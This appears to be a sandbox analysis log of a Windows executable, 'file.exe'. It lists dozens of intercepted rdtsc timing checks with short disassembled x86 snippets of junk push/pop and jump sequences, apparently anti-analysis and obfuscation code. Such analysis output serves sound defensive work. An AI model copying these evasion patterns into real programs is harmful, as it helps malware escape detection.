                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6B50 second address: BA6B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA62E8 second address: BA62FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF624C752F6h 0x0000000a pop eax 0x0000000b jl 00007FF624C752FCh 0x00000011 jbe 00007FF624C752F6h 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA62FF second address: BA6305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6305 second address: BA6311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6311 second address: BA6315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6315 second address: BA632D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75304h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA632D second address: BA6341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e ja 00007FF624B4E7D6h 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6341 second address: BA6349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6349 second address: BA634F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA634F second address: BA6353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6353 second address: BA6361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FF624B4E7D6h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6658 second address: BA6675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75309h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA67F5 second address: BA67F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6964 second address: BA6978 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FF624C752FCh 0x0000000e ja 00007FF624C752F6h 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAAA5E second address: BAAA7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAAA7D second address: BAAA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAAA81 second address: BAAA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB35C3 second address: BB35F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF624C752F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007FF624C75300h 0x00000012 jo 00007FF624C752F8h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF624C752FBh 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2392 second address: BB239B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB239B second address: BB239F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB24FA second address: BB2500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2500 second address: BB2504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2504 second address: BB251B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FF624B4E7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FF624B4E7D6h 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB251B second address: BB251F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2823 second address: BB282B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB282B second address: BB2848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF624C752FDh 0x0000000b ja 00007FF624C752F6h 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2848 second address: BB285C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FF624B4E7DEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB285C second address: BB2860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2E97 second address: BB2EA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FF624B4E7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2EA3 second address: BB2EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF624C752F6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2EAF second address: BB2ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF624B4E7DDh 0x0000000f jno 00007FF624B4E7DAh 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75DA6 second address: B75DB2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75DB2 second address: B75E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7E7h 0x00000009 popad 0x0000000a jns 00007FF624B4E7DCh 0x00000010 popad 0x00000011 nop 0x00000012 pushad 0x00000013 mov dword ptr [ebp+122D199Bh], edi 0x00000019 mov ax, dx 0x0000001c popad 0x0000001d mov cx, 734Ch 0x00000021 lea eax, dword ptr [ebp+1247AADFh] 0x00000027 cmc 0x00000028 add edi, dword ptr [ebp+122D2E6Eh] 0x0000002e nop 0x0000002f jnp 00007FF624B4E7E0h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75E03 second address: B75E16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 ja 00007FF624C752F6h 0x0000000f pop edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75EC7 second address: B75ECC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75ECC second address: B75ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75F82 second address: B75F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76298 second address: B762B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF624C75306h 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B762B9 second address: B762BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B762BF second address: B762C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B762C3 second address: B762C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B764E8 second address: B76516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jc 00007FF624C752FEh 0x0000000d push ecx 0x0000000e jnl 00007FF624C752F6h 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push edi 0x0000001a pushad 0x0000001b jmp 00007FF624C75301h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76516 second address: B76529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 jg 00007FF624B4E7E0h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76529 second address: B76537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76537 second address: B7653C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7670E second address: B76712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76712 second address: B76716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7686A second address: B76870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7710E second address: B77114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77114 second address: B77122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77122 second address: B77191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FF624B4E7D8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jno 00007FF624B4E7DCh 0x00000028 lea eax, dword ptr [ebp+1247AB23h] 0x0000002e jmp 00007FF624B4E7DDh 0x00000033 nop 0x00000034 push ebx 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 pop edx 0x00000039 pop ebx 0x0000003a push eax 0x0000003b jp 00007FF624B4E7DEh 0x00000041 nop 0x00000042 mov cx, EEE3h 0x00000046 lea eax, dword ptr [ebp+1247AADFh] 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77191 second address: B77195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77195 second address: B7719B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7719B second address: B616BC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF624C752F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnl 00007FF624C752FAh 0x00000011 nop 0x00000012 mov edx, edi 0x00000014 call dword ptr [ebp+122D28B2h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF624C752FBh 0x00000021 jne 00007FF624C752FCh 0x00000027 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2BB4A second address: B2BB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF624B4E7D6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2BB54 second address: B2BB66 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C752F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FF624C752FCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6B69 second address: BB6B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6B71 second address: BB6B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6B75 second address: BB6B7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6E86 second address: BB6E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6FEF second address: BB700C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7E9h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB700C second address: BB7010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB7010 second address: BB7016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB7016 second address: BB703B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF624C75302h 0x0000000c jng 00007FF624C752F6h 0x00000012 je 00007FF624C752F6h 0x00000018 ja 00007FF624C752F8h 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB703B second address: BB7063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF624B4E7E8h 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB7063 second address: BB706C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB706C second address: BB7076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF624B4E7D6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB7076 second address: BB707A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB707A second address: BB7083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B616B8 second address: B616BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBAB5 second address: BBBAC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF624B4E7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBAC0 second address: BBBACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBC23 second address: BBBC2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBC2A second address: BBBC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC016 second address: BBC01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC01C second address: BBC020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC020 second address: BBC02E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC1A0 second address: BBC1A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC1A8 second address: BBC1B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FF624B4E7D6h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC5DA second address: BBC5DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF6B2 second address: BBF6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF6B6 second address: BBF6C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0DCB second address: BC0E07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF624B4E7E2h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnp 00007FF624B4E7E6h 0x00000013 jmp 00007FF624B4E7E0h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007FF624B4E7DCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0E07 second address: BC0E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0E0B second address: BC0E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E5h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3E49F second address: B3E4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC38ED second address: BC38FA instructions: 0x00000000 rdtsc 0x00000002 je 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC38FA second address: BC3900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8490 second address: BC8499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8499 second address: BC84B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75305h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC84B4 second address: BC84B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC860A second address: BC8610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8610 second address: BC8618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8618 second address: BC861D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC861D second address: BC8622 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC878A second address: BC8797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8797 second address: BC87B9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FF624B4E7E4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FF624B4E7D6h 0x00000013 rdtsc
